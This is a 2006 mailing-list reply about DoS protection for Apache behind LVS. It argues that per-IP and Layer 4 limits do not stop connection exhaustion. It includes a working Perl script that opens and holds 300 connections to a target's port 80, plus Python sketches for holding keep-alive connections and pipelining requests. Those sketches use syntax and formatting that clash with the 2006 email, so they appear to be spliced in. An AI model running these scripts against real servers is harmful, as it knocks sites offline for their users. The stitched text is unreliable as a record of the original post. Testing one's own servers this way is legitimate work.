Re: DoS protection strategies

To: "LinuxVirtualServer.org users mailing list." <lvs-users@xxxxxxxxxxxxxxxxxxxxxx>
Subject: Re: DoS protection strategies
From: Roberto Nibali <ratz@xxxxxxxxxxxx>
Date: Tue, 18 Apr 2006 20:41:18 +0200
Hello,

> To my surprise, opening 150 TCP connections to a default Apache
> installation is enough to effectively DoS it for a few minutes (until
> the connections time out).

What is your exact setup?

Only on a really badly configured web server, or maybe on a 486 machine :). Otherwise this does not hold: any web server will easily handle at least 1000 concurrent TCP connections. Beyond that you need some ulimit or epoll tweaking.
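The ulimit side of that can be checked from inside a process; each TCP connection consumes one file descriptor, so the RLIMIT_NOFILE soft limit caps how many connections a server (or a test client like the script below) can hold open. A minimal sketch (Unix-only; the `can_hold` helper and its `reserve` margin are my own illustration, not part of any tool mentioned here):

```python
import resource

# Every open TCP socket costs one file descriptor, so the soft
# RLIMIT_NOFILE limit is the hard ceiling on concurrent connections.
soft, hard = resource.getrlimit(resource.RLIMIT_NOFILE)
print(f"soft fd limit: {soft}, hard fd limit: {hard}")

def can_hold(n_connections, reserve=32):
    """Rough check: can this process hold n_connections sockets while
    keeping `reserve` descriptors free for stdio, logs, etc.?"""
    soft, _ = resource.getrlimit(resource.RLIMIT_NOFILE)
    return n_connections + reserve <= soft
```

Raising the limit (via `ulimit -n` or `resource.setrlimit`) is what "ulimit tweaking" means here; epoll tweaking is about how the server multiplexes those descriptors, not how many it may have.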

> This could be circumvented by using mod_throttle, mod_bwshare or
> mod_limitipconn but imho a much better

Nope, you then just open an HTTP/1.1 channel and reload using GET / every KeepAliveTimeout-1 seconds. Those modules will not help much IMHO: they only do QoS on established sockets, which is the wrong place to interfere.
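That keep-alive trick can be sketched roughly as follows (the host, the 14-second refresh, and the round count are assumptions for illustration; Apache's default KeepAliveTimeout is 15 seconds, so re-requesting just under that keeps the connection from being reaped):

```python
import socket
import time

def build_request(host):
    # Minimal HTTP/1.1 GET that asks the server to keep the
    # connection open after the response.
    return ("GET / HTTP/1.1\r\n"
            f"Host: {host}\r\n"
            "Connection: keep-alive\r\n"
            "\r\n").encode()

def hold_connection(host, refresh=14, rounds=10):
    """Open one connection and re-issue GET / just before the
    server's keep-alive timeout expires, so the socket is never
    idle long enough to be closed."""
    sock = socket.create_connection((host, 80))
    for _ in range(rounds):
        sock.sendall(build_request(host))
        sock.recv(65536)      # drain (part of) the response
        time.sleep(refresh)   # sleep just under the assumed timeout
    sock.close()
```

Per-IP connection limits never trigger because this is one perfectly legitimate established socket; the worker it occupies is tied up all the same.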

> place to solve this is at the LVS load balancer, which already does
> source IP tracking for the "persistence" feature.

That does not help either: this is not a Layer 4 issue, it is a higher-layer issue. And even if it were, how would source IP tracking help?

> Did anyone implement such a feature? Considerations?

Check out HTTP/1.1 and pipelining, and read up on the relevant timeout configuration and so on.
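For reference, pipelining means sending several requests back-to-back on one connection without waiting for the responses in between; the server must answer them in order. A minimal sketch of building such a request burst (host and paths are placeholders):

```python
def pipeline(host, paths):
    """Concatenate several HTTP/1.1 GETs into one byte string, to be
    written to a single socket in one go (pipelining)."""
    return b"".join(
        (f"GET {p} HTTP/1.1\r\n"
         f"Host: {host}\r\n"
         "\r\n").encode()
        for p in paths
    )
```

One `sendall()` of this buffer makes the server queue several responses on one worker, which is why the timing and timeout settings matter so much more than per-socket QoS modules.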

A sample script to test your webhosting provider:

#!/usr/bin/perl
use strict;
use warnings;
use IO::Socket::INET;

my $target = shift or die "Usage: $0 <target>\n";
my @cons;

# Open 300 TCP connections to port 80 and hold them all open.
for my $t (0 .. 300) {
    print "Try $t... ";
    $cons[$t] = IO::Socket::INET->new(
        PeerAddr => "$target:80",
        Proto    => 'tcp',
        Blocking => 1,
    ) or die "Couldn't connect: $!\n";
    print "connected!\n";
}

print "Press Enter to drop the connections...\n";
<STDIN>;

Besides, only a poorly configured web server will let you hold a socket open after a simple TCP handshake without ever sending data; a web server configured for HTTP/1.1 with low timeouts will simply close the socket on you.

You are right, however, that such an approach of blocking TCP connections (_including_ data fetching) can take down a lot of (even very well-known) web sites. I actually started writing a paper on this last year but never finished it. I wrote a proof-of-concept tool that would (after some scanning and timeout guessing) block a whole web site if it was not properly configured. This was done using the cURL library; it simulates some sort of slow-start Slashdot effect.

Best regards,
Roberto Nibali, ratz
--
echo '[q]sa[ln0=aln256%Pln256/snlbx]sb3135071790101768542287578439snlbxq' | dc
